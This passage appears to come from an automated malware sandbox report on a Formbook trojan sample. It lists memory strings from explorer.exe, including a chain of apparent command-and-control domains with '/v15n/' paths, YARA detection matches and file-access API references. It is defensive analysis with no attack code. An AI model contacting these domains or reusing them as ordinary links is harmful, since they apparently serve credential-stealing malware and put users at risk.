              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lawyers-br-pt-9390663.fyi/v15n/www.boostgrowmode.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lawyers-br-pt-9390663.fyiReferer:
              Source: explorer.exe, 00000004.00000002.3827556743.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mirotcg.info
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mirotcg.info/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mirotcg.info/v15n/www.mxrkpkngishbdss.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mirotcg.infoReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mxrkpkngishbdss.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mxrkpkngishbdss.xyz/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mxrkpkngishbdss.xyz/v15n/www.lawyers-br-pt-9390663.fyi
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mxrkpkngishbdss.xyzReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv.xyz/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv.xyz/v15n/www.mirotcg.info
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv.xyzReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.syedlatief.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.syedlatief.com/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.syedlatief.com/v15n/www.gtur.top
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.syedlatief.comReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordcraftart.fun
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordcraftart.fun/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordcraftart.fun/v15n/www.suv.xyz
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordcraftart.funReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y7rak9.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y7rak9.com/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y7rak9.com/v15n/www.wordcraftart.fun
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y7rak9.comReferer:
              Source: explorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
              Source: explorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
              Source: explorer.exe, 00000004.00000002.3833528004.000000000BCC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BCB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285667724.000000000BCBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
              Source: explorer.exe, 00000004.00000003.2285362723.000000000704B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3824583001.000000000704E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
              Source: explorer.exe, 00000004.00000002.3823977280.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000004.00000002.3826801349.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
              Source: explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3826801349.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3826801349.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
              Source: explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
              Source: explorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
              Source: explorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
              Source: explorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000004.00000000.1406109687.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
              Source: explorer.exe, 00000004.00000002.3832766663.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1406109687.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
              Source: explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

              E-Banking Fraud

              Source: Yara match File source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.3839526492.0000000010EC9000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_772cc62d, Author: unknown
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7408, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7576, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: Process Memory Space: cscript.exe PID: 7720, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_0041A360 NtCreateFile
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe; Code function: 3_2_0041A410 NtReadFile
